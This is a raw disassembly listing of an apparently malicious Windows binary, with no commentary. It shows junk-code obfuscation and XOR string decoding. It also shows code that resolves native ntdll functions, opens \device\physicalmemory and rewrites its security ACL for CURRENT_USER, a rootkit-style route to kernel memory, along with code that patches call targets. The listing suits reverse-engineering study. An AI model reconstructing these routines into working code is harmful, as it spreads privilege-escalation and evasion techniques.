mov eax, dword_43B2AC
add eax, esi
mov byte ptr ds:dword_410850[eax], 0
mov edi, dword_43B2AC
mov eax, edi
add eax, 3
add eax, esi
mov dword_43B2AC, eax
cmp eax, 0DBBh
jle short loc_401B90
and dword_43B2AC, 0
loc_401B90: ; CODE XREF: .text:00401B87�j
lea eax, dword_410850[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B9A proc near ; CODE XREF: sub_405601+66A�p
; sub_409847+D36�p
var_A = byte ptr -0Ah
var_3 = byte ptr -3
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
call sub_40C538 ; RtlGetLastWin32Error
mov [ebp+var_2], 4231h
inc [ebp+var_2]
mov ebx, [ebp+arg_4]
jmp short loc_401C0E
; ---------------------------------------------------------------------------
loc_401BB7: ; CODE XREF: sub_401B9A+7B�j
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 0Dh
jnz short loc_401C0D
lea edi, [ebp+var_A]
lea esi, aRrQa ; "rr/+Q"
mov ecx, 7
rep movsb
mov eax, [ebp+arg_4]
mov edx, ebx
sub edx, eax
push edx
mov edx, [ebp+arg_0]
add edx, eax
push edx
push [ebp+arg_8]
call sub_40C9F4
add esp, 0Ch
mov [ebp+var_3], 0DEh
movzx eax, [ebp+var_3]
imul eax, 6325h
mov [ebp+var_3], al
mov eax, ebx
sub eax, [ebp+arg_4]
mov edx, [ebp+arg_8]
mov byte ptr [edx+eax], 0
mov eax, ebx
add eax, 2
jmp short loc_401C7E
; ---------------------------------------------------------------------------
loc_401C0D: ; CODE XREF: sub_401B9A+24�j
inc ebx
loc_401C0E: ; CODE XREF: sub_401B9A+1B�j
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 0
jnz short loc_401BB7
cmp [ebp+arg_4], 0
jz short loc_401C43
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 0
jnz short loc_401C43
mov eax, ebx
dec eax
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 0Ah
jnz short loc_401C43
call sub_40C634 ; IsDebuggerPresent
mov eax, [ebp+arg_8]
mov byte ptr [eax], 0
mov eax, [ebp+arg_4]
inc eax
jmp short loc_401C7E
; ---------------------------------------------------------------------------
loc_401C43: ; CODE XREF: sub_401B9A+81�j
; sub_401B9A+8A�j ...
mov eax, [ebp+arg_0]
add eax, [ebp+arg_4]
push eax
call sub_40C73C ; lstrlenA
mov ebx, eax
or ebx, ebx
jz short loc_401C7C
call sub_40C5A4 ; GetVersion
mov eax, [ebp+arg_0]
add eax, [ebp+arg_4]
push eax
push [ebp+arg_8]
call sub_40C4B8
mov word ptr [ebp-4], 33AEh
sub word ptr [ebp-4], 32B9h
mov eax, [ebp+arg_4]
add eax, ebx
jmp short loc_401C7E
; ---------------------------------------------------------------------------
loc_401C7C: ; CODE XREF: sub_401B9A+B9�j
xor eax, eax
loc_401C7E: ; CODE XREF: sub_401B9A+71�j
; sub_401B9A+A7�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_401B9A endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_43B2C0
lea eax, ds:436120h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
xor edi, edi
jmp short loc_401CC3
; ---------------------------------------------------------------------------
loc_401CA9: ; CODE XREF: .text:00401CC5�j
mov eax, dword_43B2C0
add eax, edi
lea eax, ds:436120h[eax]
movsx edx, byte ptr [eax]
xor edx, 0A7h
mov [eax], dl
inc edi
loc_401CC3: ; CODE XREF: .text:00401CA7�j
cmp edi, esi
jl short loc_401CA9
mov eax, dword_43B2C0
add eax, esi
mov byte ptr ds:dword_436120[eax], 0
xor edi, edi
mov edi, dword_43B2C0
mov eax, edi
add eax, 3
add eax, esi
mov dword_43B2C0, eax
inc dword_43B2C0
cmp dword_43B2C0, 0DC7h
jle short loc_401D03
and dword_43B2C0, 0
loc_401D03: ; CODE XREF: .text:00401CFA�j
mov dword ptr [ebp-4], 347h
lea eax, dword_436120[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D14 proc near ; CODE XREF: sub_4028A6+5D�p
var_20 = dword ptr -20h
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = dword ptr -18h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_B = byte ptr -0Bh
var_4 = word ptr -4
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 24h
push ebx
push esi
push edi
mov [ebp+var_1], 60h
movzx eax, [ebp+var_1]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1], al
inc dword_43B228
mov [ebp+var_4], 1DB7h
movzx eax, [ebp+var_4]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_4], ax
mov ebx, [ebp+arg_0]
and ds:dword_40E00C, 0
and ds:dword_41DA70, 0
and ds:dword_41DA88, 0
and ds:dword_40F268, 0
mov ds:dword_41A860, 4
mov ds:dword_413F84, 4
loc_401D7B: ; CODE XREF: sub_401D14+154�j
; sub_401D14+175�j ...
mov eax, ebx
inc ebx
mov al, [eax]
mov ds:byte_413F80, al
movzx eax, ds:byte_413F80
or eax, eax
jl loc_40200C
cmp eax, 0FFh
jg loc_40200C
jmp off_43B2D4[eax*4]
; ---------------------------------------------------------------------------
lea edi, [ebp+var_19]
lea esi, aL2r6_ ; "l2r-6;."
movsd
movsd
loc_401DB1: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+2B3�j
; DATA XREF: ...
or byte ptr ds:dword_41DA70, 40h
lea edi, [ebp+var_1A]
lea esi, byte_43B2CC
xor ecx, ecx
inc ecx
rep movsb
jmp loc_40200C
; ---------------------------------------------------------------------------
inc dword_43B228
loc_401DD1: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+2B3�j
; DATA XREF: ...
xor eax, eax
cmp byte ptr [ebx], 20h
setnz al
dec eax
and eax, 4
inc eax
mov [ebp+var_20], eax
add ds:dword_41DA88, eax
jmp loc_40200C
; ---------------------------------------------------------------------------
loc_401DEC: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+2B3�j
; DATA XREF: ...
or byte ptr ds:dword_41DA70, 40h
test byte ptr [ebx], 38h
jnz loc_40200C
call sub_40C598 ; GetTickCount
loc_401E01: ; CODE XREF: sub_401D14+8B�j
; DATA XREF: .data:0043B2E4�o ...
test ds:byte_413F80, 1
jz short loc_401E1A
mov eax, ds:dword_41A860
add ds:dword_41DA88, eax
jmp loc_40200C
; ---------------------------------------------------------------------------
loc_401E1A: ; CODE XREF: sub_401D14+F4�j
inc ds:dword_41DA88
jmp loc_40200C
; ---------------------------------------------------------------------------
loc_401E25: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+2B3�j
; DATA XREF: ...
inc ds:dword_41DA88
jmp loc_40200C
; ---------------------------------------------------------------------------
inc dword_43B228
loc_401E36: ; CODE XREF: sub_401D14+8B�j
; DATA XREF: .data:0043B36C�o ...
test byte ptr ds:dword_41DA70, 10h
jz short loc_401E46
xor eax, eax
jmp loc_402199
; ---------------------------------------------------------------------------
loc_401E46: ; CODE XREF: sub_401D14+129�j
mov [ebp+var_11], 7Dh
movzx eax, [ebp+var_11]
imul eax, 46DCh
mov [ebp+var_11], al
or byte ptr ds:dword_41DA70, 10h
mov al, ds:byte_413F80
mov ds:byte_40F274, al
jmp loc_401D7B
; ---------------------------------------------------------------------------
loc_401E6D: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+2B3�j
; DATA XREF: ...
test byte ptr ds:dword_41DA70, 4
jz short loc_401E7D
xor eax, eax
jmp loc_402199
; ---------------------------------------------------------------------------
loc_401E7D: ; CODE XREF: sub_401D14+160�j
call sub_40C5A4 ; GetVersion
or byte ptr ds:dword_41DA70, 4
jmp loc_401D7B
; ---------------------------------------------------------------------------
loc_401E8E: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+2B3�j
; DATA XREF: ...
test byte ptr ds:dword_41DA70, 8
jz short loc_401E9E
xor eax, eax
jmp loc_402199
; ---------------------------------------------------------------------------
loc_401E9E: ; CODE XREF: sub_401D14+181�j
call sub_40C538 ; RtlGetLastWin32Error
or byte ptr ds:dword_41DA70, 8
mov al, ds:byte_413F80
mov ds:byte_41EB80, al
jmp loc_401D7B
; ---------------------------------------------------------------------------
loc_401EB9: ; CODE XREF: sub_401D14+8B�j
; DATA XREF: .data:0043B46C�o
test byte ptr ds:dword_41DA70, 1
jz short loc_401EC9
xor eax, eax
jmp loc_402199
; ---------------------------------------------------------------------------
loc_401EC9: ; CODE XREF: sub_401D14+1AC�j
call sub_40C598 ; GetTickCount
or byte ptr ds:dword_41DA70, 1
mov ds:dword_41A860, 2
jmp loc_401D7B
; ---------------------------------------------------------------------------
loc_401EE4: ; CODE XREF: sub_401D14+8B�j
; DATA XREF: .data:0043B470�o
test byte ptr ds:dword_41DA70, 2
jz short loc_401EF4
xor eax, eax
jmp loc_402199
; ---------------------------------------------------------------------------
loc_401EF4: ; CODE XREF: sub_401D14+1D7�j
or byte ptr ds:dword_41DA70, 2
mov ds:dword_413F84, 2
jmp loc_401D7B
; ---------------------------------------------------------------------------
inc dword_43B228
loc_401F10: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+2B3�j
; DATA XREF: ...
inc ds:dword_41DA88
or byte ptr ds:dword_41DA70, 40h
jmp loc_40200C
; ---------------------------------------------------------------------------
loc_401F22: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+2B3�j
; DATA XREF: ...
mov eax, ds:dword_41A860
add ds:dword_41DA88, eax
or byte ptr ds:dword_41DA70, 40h
jmp loc_40200C
; ---------------------------------------------------------------------------
loc_401F39: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+2B3�j
; DATA XREF: ...
mov eax, ds:dword_41A860
add eax, 2
add ds:dword_41DA88, eax
jmp loc_40200C
; ---------------------------------------------------------------------------
loc_401F4C: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+2B3�j
; DATA XREF: ...
mov eax, ds:dword_413F84
add ds:dword_40F268, eax
jmp loc_40200C
; ---------------------------------------------------------------------------
loc_401F5C: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+2B3�j
; DATA XREF: ...
mov eax, ds:dword_41A860
add ds:dword_41DA88, eax
jmp loc_40200C
; ---------------------------------------------------------------------------
inc dword_43B228
loc_401F72: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+2B3�j
; DATA XREF: ...
add ds:dword_41DA88, 2
jmp loc_40200C
; ---------------------------------------------------------------------------
loc_401F7E: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+2B3�j
; DATA XREF: ...
add ds:dword_41DA88, 3
jmp loc_40200C
; ---------------------------------------------------------------------------
loc_401F8A: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+2B3�j
; DATA XREF: ...
xor eax, eax
jmp loc_402199
; ---------------------------------------------------------------------------
loc_401F91: ; CODE XREF: sub_401D14+8B�j
; DATA XREF: .data:0043B310�o
or byte ptr ds:dword_41DA70, 20h
mov eax, ebx
inc ebx
mov al, [eax]
mov ds:byte_42EB90, al
movzx eax, ds:byte_42EB90
or eax, eax
jl short loc_402005
cmp eax, 0Bh
jg short loc_401FB9
jmp off_43B6D4[eax*4]
; ---------------------------------------------------------------------------
loc_401FB9: ; CODE XREF: sub_401D14+29C�j
cmp eax, 80h
jl short loc_402005
cmp eax, 0CFh
jg short loc_402005
jmp off_43B504[eax*4]
; ---------------------------------------------------------------------------
call sub_40C514 ; GetCurrentThreadId
loc_401FD3: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+29E�j ...
or byte ptr ds:dword_41DA70, 40h
call sub_40C514 ; GetCurrentThreadId
jmp short loc_40200C
; ---------------------------------------------------------------------------
inc dword_43B228
jmp short loc_40200C
; ---------------------------------------------------------------------------
loc_401FE9: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+29E�j ...
mov eax, ds:dword_41A860
add ds:dword_41DA88, eax
jmp short loc_40200C
; ---------------------------------------------------------------------------
loc_401FF6: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+29E�j ...
inc ds:dword_41DA88
or byte ptr ds:dword_41DA70, 40h
jmp short loc_40200C
; ---------------------------------------------------------------------------
loc_402005: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+297�j ...
xor eax, eax
jmp loc_402199
; ---------------------------------------------------------------------------
loc_40200C: ; CODE XREF: sub_401D14+7A�j
; sub_401D14+85�j ...
inc dword_43B228
test byte ptr ds:dword_41DA70, 40h
jz loc_40211A
call sub_40C538 ; RtlGetLastWin32Error
mov eax, ebx
inc ebx
mov al, [eax]
mov ds:byte_42FCFC, al
call sub_40C598 ; GetTickCount
movzx eax, ds:byte_42FCFC
and eax, 0C0h
mov [ebp+var_11], al
movzx eax, ds:byte_42FCFC
and eax, 7
mov [ebp+var_12], al
movzx eax, [ebp+var_11]
cmp eax, 0C0h
jz loc_40211A
mov [ebp+var_13], 0A5h
movzx eax, [ebp+var_13]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_13], al
cmp [ebp+var_11], 40h
jnz short loc_40207B
inc ds:dword_40F268
loc_40207B: ; CODE XREF: sub_401D14+35F�j
call sub_40C514 ; GetCurrentThreadId
movzx eax, [ebp+var_11]
cmp eax, 80h
jnz short loc_402096
mov eax, ds:dword_413F84
add ds:dword_40F268, eax
loc_402096: ; CODE XREF: sub_401D14+375�j
mov [ebp+var_18], 4587h
mov eax, [ebp+var_18]
mov edx, eax
add edx, eax
mov [ebp+var_18], edx
cmp ds:dword_413F84, 2
jnz short loc_4020CA
call sub_40C508 ; GetCurrentProcessId
cmp [ebp+var_11], 0
jnz short loc_40211A
cmp [ebp+var_12], 6
jnz short loc_40211A
add ds:dword_40F268, 2
jmp short loc_40211A
; ---------------------------------------------------------------------------
loc_4020CA: ; CODE XREF: sub_401D14+39A�j
call sub_40C514 ; GetCurrentThreadId
cmp [ebp+var_12], 4
jnz short loc_402102
mov dword ptr [ebp-1Ch], 2A45h
inc dword ptr [ebp-1Ch]
or byte ptr ds:dword_41DA70, 80h
call sub_40C514 ; GetCurrentThreadId
mov eax, ebx
inc ebx
mov al, [eax]
mov ds:byte_41A85C, al
movzx eax, ds:byte_41A85C
and eax, 7
mov [ebp+var_12], al
loc_402102: ; CODE XREF: sub_401D14+3BF�j
cmp [ebp+var_12], 5
jnz short loc_402115
cmp [ebp+var_11], 0
jnz short loc_402115
add ds:dword_40F268, 4
loc_402115: ; CODE XREF: sub_401D14+3F2�j
; sub_401D14+3F8�j
call sub_40C5A4 ; GetVersion
loc_40211A: ; CODE XREF: sub_401D14+305�j
; sub_401D14+344�j ...
and ds:dword_40F26C, 0
jmp short loc_40213B
; ---------------------------------------------------------------------------
loc_402123: ; CODE XREF: sub_401D14+432�j
mov eax, ebx
inc ebx
mov edx, ds:dword_40F26C
mov al, [eax]
mov ds:byte_413F78[edx], al
inc ds:dword_40F26C
loc_40213B: ; CODE XREF: sub_401D14+40D�j
mov eax, ds:dword_40F268
cmp ds:dword_40F26C, eax
jb short loc_402123
lea edi, [ebp+var_B]
lea esi, aF50z ; "F 5 0z"
mov ecx, 7
rep movsb
and ds:dword_40F26C, 0
jmp short loc_402179
; ---------------------------------------------------------------------------
loc_402161: ; CODE XREF: sub_401D14+470�j
mov eax, ebx
inc ebx
mov edx, ds:dword_40F26C
mov al, [eax]
mov ds:byte_439330[edx], al
inc ds:dword_40F26C
loc_402179: ; CODE XREF: sub_401D14+44B�j
mov eax, ds:dword_41DA88
cmp ds:dword_40F26C, eax
jb short loc_402161
inc dword_43B228
mov eax, ebx
sub eax, [ebp+arg_0]
mov ds:dword_40E00C, eax
xor eax, eax
inc eax
loc_402199: ; CODE XREF: sub_401D14+12D�j
; sub_401D14+164�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_401D14 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 1F7h
push esi
push dword ptr [ebp+8]
mov eax, dword_43BF3C
lea eax, ds:417640h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
xor edi, edi
jmp short loc_4021E7
; ---------------------------------------------------------------------------
loc_4021CD: ; CODE XREF: .text:004021E9�j
mov eax, dword_43BF3C
add eax, edi
lea eax, ds:417640h[eax]
movsx edx, byte ptr [eax]
xor edx, 88h
mov [eax], dl
inc edi
loc_4021E7: ; CODE XREF: .text:004021CB�j
cmp edi, esi
jl short loc_4021CD
mov dword ptr [ebp-8], 182h
mov eax, dword_43BF3C
add eax, esi
mov byte ptr ds:dword_417640[eax], 0
xor edi, edi
mov edi, dword_43BF3C
add dword_43BF3C, 3
mov eax, dword_43BF3C
inc eax
add eax, esi
mov dword_43BF3C, eax
cmp eax, 0E06h
jle short loc_40222B
and dword_43BF3C, 0
loc_40222B: ; CODE XREF: .text:00402222�j
mov dword ptr [ebp-0Ch], 1D5h
lea eax, dword_417640[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40223C proc near ; CODE XREF: sub_402A4D+1E�p
var_A = byte ptr -0Ah
var_2 = word ptr -2
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
call sub_40C634 ; IsDebuggerPresent
push offset aNtdll_dll ; "ntdll.dll"
call sub_40C550 ; GetModuleHandleA
mov ebx, eax
lea edi, [ebp+var_A]
lea esi, aA_utc2 ; "_utc*2"
movsd
movsd
push offset aRtlinitunicode ; "RtlInitUnicodeString"
push ebx
call sub_40C568 ; GetProcAddress
mov ds:dword_42FCF4, eax
call sub_40C634 ; IsDebuggerPresent
push offset aNtunmapviewofs ; "NtUnmapViewOfSection"
push ebx
call sub_40C568 ; GetProcAddress
mov ds:dword_41C954, eax
call sub_40C538 ; RtlGetLastWin32Error
push offset aNtopensection ; "NtOpenSection"
push ebx
call sub_40C568 ; GetProcAddress
mov ds:dword_41A868, eax
mov [ebp+var_2], 2FA0h
sub [ebp+var_2], 63DAh
push offset aNtmapviewofsec ; "NtMapViewOfSection"
push ebx
call sub_40C568 ; GetProcAddress
mov ds:dword_41DA80, eax
push offset aRtlntstatustod ; "RtlNtStatusToDosError"
push ebx
call sub_40C568 ; GetProcAddress
mov ds:dword_42FCF0, eax
pop edi
pop esi
pop ebx
leave
retn
sub_40223C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4022CC proc near ; CODE XREF: sub_402A4D+16A�p
var_88 = byte ptr -88h
var_81 = byte ptr -81h
var_79 = dword ptr -79h
var_75 = byte ptr -75h
var_6D = byte ptr -6Dh
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = byte ptr -60h
var_58 = byte ptr -58h
var_57 = byte ptr -57h
var_56 = word ptr -56h
var_53 = byte ptr -53h
var_52 = word ptr -52h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 88h
push ebx
push esi
push edi
mov [ebp+var_53], 0B5h
movzx eax, [ebp+var_53]
imul eax, 5810h
mov [ebp+var_53], al
lea edi, [ebp+var_6D]
lea esi, aHgtr ; "hgtr"
mov ecx, 5
rep movsb
push offset aDevicePhysical ; "\\device\\physicalmemory"
lea eax, [ebp+var_60]
push eax
call ds:dword_42FCF4
lea edi, [ebp+var_75]
lea esi, aQOkgoj ; "Q!okgOJ"
movsd
movsd
mov [ebp+var_18], 18h
and [ebp+var_14], 0
lea eax, [ebp+var_60]
mov [ebp+var_10], eax
call sub_40C514 ; GetCurrentThreadId
mov [ebp+var_C], 40h
mov eax, dword_43C00F
mov [ebp+var_79], eax
and [ebp+var_8], 0
call sub_40C508 ; GetCurrentProcessId
and [ebp+var_4], 0
mov [ebp+var_56], 58E2h
inc [ebp+var_56]
and [ebp+var_30], 0
mov [ebp+var_52], 721Bh
movzx eax, [ebp+var_52]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_52], ax
and [ebp+var_2C], 0
lea edi, [ebp+var_81]
lea esi, aXghyb_v ; "Xhyb."
mov ecx, 2
rep movsd
mov [ebp+var_28], 1
mov [ebp+var_57], 71h
sub [ebp+var_57], 0F4h
mov [ebp+var_24], 1
lea eax, aCurrent_user ; "CURRENT_USER"
mov [ebp+var_20], eax
mov [ebp+var_50], 2
call sub_40C634 ; DATA XREF: sub_43F401+2F�o
mov [ebp+var_4C], 1
call sub_40C514 ; GetCurrentThreadId
and [ebp+var_48], 0
mov [ebp+var_58], 74h
add [ebp+var_58], 1
lea edi, [ebp+var_44]
lea esi, [ebp+var_30]
mov ecx, 5
rep movsd
call sub_40C574 ; GetProcessHeap
lea eax, [ebp+var_18]
push eax
push 60000h
lea eax, [ebp+var_1C]
push eax
call ds:dword_41A868
mov ebx, 762Dh
inc ebx
lea eax, [ebp+var_88]
push eax
push 0
lea eax, [ebp+var_64]
push eax
push 0
push 0
push 4
push 6
push [ebp+var_1C]
call sub_40C958 ; GetSecurityInfo
call sub_40C5A4 ; GetVersion
lea eax, [ebp+var_68]
push eax
push [ebp+var_64]
lea eax, [ebp+var_50]
push eax
mov eax, 0Bh
sub eax, dword_43BF38
push eax
call sub_40C970 ; SetEntriesInAclA
call sub_40C514 ; GetCurrentThreadId
push 0
push [ebp+var_68]
push 0
push 0
push 4
push 6
push [ebp+var_1C]
call sub_40C964 ; SetSecurityInfo
push [ebp+var_1C]
call sub_40C55C ; CloseHandle
lea eax, [ebp+var_18]
push eax
push [ebp+var_50]
lea eax, [ebp+var_1C]
push eax
call ds:dword_41A868
mov eax, [ebp+var_1C]
pop edi
pop esi
pop ebx
leave
retn
sub_4022CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402465 proc near ; CODE XREF: sub_402A4D+265�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
call sub_40C508 ; GetCurrentProcessId
mov eax, [ebp+arg_4]
mov [ebp+var_C], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
and [ebp+var_8], 0
call sub_40C598 ; GetTickCount
mov eax, [ebp+var_C]
xor edx, edx
mov [ebp+var_10], edx
mov [ebp+var_14], eax
call sub_40C514 ; GetCurrentThreadId
push 4
push 0
push 1
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_14]
push eax
push [ebp+var_4]
push 0
lea eax, [ebp+var_8]
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
call ds:dword_41DA80
call sub_40C508 ; GetCurrentProcessId
mov eax, [ebp+var_8]
leave
retn
sub_402465 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4024C1 proc near ; CODE XREF: sub_402A4D+36A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
call sub_40C598 ; GetTickCount
push [ebp+arg_0]
push 0FFFFFFFFh
call ds:dword_41C954
call sub_40C508 ; GetCurrentProcessId
pop ebp
retn
sub_4024C1 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 8Bh
push esi
push dword ptr [ebp+8]
mov eax, dword_43C024
lea eax, ds:412DE0h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
xor edi, edi
jmp short loc_402520
; ---------------------------------------------------------------------------
loc_402509: ; CODE XREF: .text:00402522�j
mov eax, dword_43C024
add eax, edi
lea eax, ds:412DE0h[eax]
movsx edx, byte ptr [eax]
xor edx, 42h
mov [eax], dl
inc edi
loc_402520: ; CODE XREF: .text:00402507�j
cmp edi, esi
jl short loc_402509
mov dword ptr [ebp-8], 15Eh
mov eax, dword_43C024
add eax, esi
mov byte ptr ds:dword_412DE0[eax], 0
xor edi, edi
mov edi, dword_43C024
mov eax, edi
add eax, 5
add eax, esi
mov dword_43C024, eax
add dword_43C024, 2
cmp dword_43C024, 0DF6h
jle short loc_402568
and dword_43C024, 0
loc_402568: ; CODE XREF: .text:0040255F�j
lea eax, dword_412DE0[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402572 proc near ; CODE XREF: sub_4028A6+19A�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_E = word ptr -0Eh
var_C = word ptr -0Ch
var_A = word ptr -0Ah
var_8 = word ptr -8
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_4], 6A0Dh
mov eax, [ebp+var_4]
mov edx, eax
add edx, eax
mov [ebp+var_4], edx
xor ebx, ebx
loc_40258E: ; CODE XREF: sub_402572+329�j
mov [ebp+var_8], 0A92h
movzx eax, [ebp+var_8]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_8], ax
mov eax, [ebp+arg_0]
movzx edx, byte ptr [eax+ebx]
cmp edx, 0FFh
jnz short loc_4025E8
movzx edx, byte ptr [ebx+eax+1]
cmp edx, 0FFh
jnz short loc_4025E8
movzx edx, byte ptr [ebx+eax+2]
cmp edx, 0FFh
jnz short loc_4025E8
movzx edx, byte ptr [ebx+eax+3]
cmp edx, 0FFh
jnz short loc_4025E8
movzx eax, byte ptr [ebx+eax+4]
cmp eax, 0FFh
jz loc_4028A1
loc_4025E8: ; CODE XREF: sub_402572+3D�j
; sub_402572+4A�j ...
mov [ebp+var_A], 143Ah
movzx eax, [ebp+var_A]
imul eax, 5B68h
mov [ebp+var_A], ax
mov eax, [ebp+arg_4]
mov edx, [ebp+arg_8]
lea eax, [eax+edx+5]
mov edx, [ebp+arg_0]
mov dl, [edx+ebx]
mov [eax+ebx], dl
call sub_40C514 ; GetCurrentThreadId
mov [ebp+var_5], 0
loc_402618: ; CODE XREF: sub_402572+1B2�j
mov eax, [ebp+arg_0]
movzx edx, [ebp+var_5]
imul edx, 0Ch
movzx edx, byte_43C0B4[edx]
movzx ecx, byte ptr [eax+ebx]
cmp ecx, edx
jnz loc_40270A
mov ecx, ebx
dec ecx
movzx ecx, byte ptr [eax+ecx]
cmp ecx, edx
jnz loc_40270A
mov ecx, ebx
sub ecx, 2
movzx ecx, byte ptr [eax+ecx]
cmp ecx, edx
jnz loc_40270A
mov ecx, ebx
sub ecx, 3
movzx ecx, byte ptr [eax+ecx]
cmp ecx, edx
jnz loc_40270A
mov edx, ebx
sub edx, 4
movzx eax, byte ptr [eax+edx]
cmp eax, 0E8h
jnz loc_40270A
mov [ebp+var_C], 184h
movzx eax, [ebp+var_C]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_C], ax
movzx eax, [ebp+var_5]
imul eax, 0Ch
push off_43C0BC[eax]
call sub_40C550 ; GetModuleHandleA
movzx edi, [ebp+var_5]
imul edi, 0Ch
push off_43C0B8[edi]
push eax
call sub_40C568 ; GetProcAddress
mov [ebp+var_18], eax
or eax, 0FFFFFFFFh
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_8]
lea edx, [edx+ecx+5]
add edx, ebx
sub edx, 4
sub eax, edx
add eax, [ebp+var_18]
sub eax, 4
mov [ebp+var_1C], eax
mov [ebp+var_E], 1041h
sub [ebp+var_E], 73D6h
mov eax, [ebp+arg_4]
mov edx, ecx
lea eax, [eax+edx+5]
add eax, ebx
sub eax, 4
mov edx, [ebp+var_1C]
mov ds:1[eax], edx
mov [ebp+var_14], 4B75h
add [ebp+var_14], 37C2h
jmp short loc_402729
; ---------------------------------------------------------------------------
loc_40270A: ; CODE XREF: sub_402572+BE�j
; sub_402572+CD�j ...
movzx eax, [ebp+var_5]
imul eax, 0Ch
cmp off_43C0B8[eax], 0
jz short loc_402729
call sub_40C538 ; RtlGetLastWin32Error
add [ebp+var_5], 1
jmp loc_402618
; ---------------------------------------------------------------------------
loc_402729: ; CODE XREF: sub_402572+196�j
; sub_402572+1A7�j
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 4
jnz short loc_402798
mov edx, ebx
dec edx
cmp byte ptr [eax+edx], 4
jnz short loc_402798
mov edx, ebx
sub edx, 2
cmp byte ptr [eax+edx], 4
jnz short loc_402798
mov edx, ebx
sub edx, 3
cmp byte ptr [eax+edx], 4
jnz short loc_402798
mov edx, ebx
sub edx, 4
movzx edx, byte ptr [eax+edx]
cmp dl, 68h
jz short loc_402772
cmp edx, 0BEh
jz short loc_402772
mov edx, ebx
sub edx, 5
cmp byte ptr [eax+edx], 24h
jnz short loc_402798
loc_402772: ; CODE XREF: sub_402572+1EB�j
; sub_402572+1F3�j
mov [ebp+var_C], 53AEh
inc [ebp+var_C]
mov eax, [ebp+arg_4]
add eax, [ebp+arg_8]
lea edx, [eax+ebx+5]
sub edx, 4
add eax, 7
mov ds:1[edx], eax
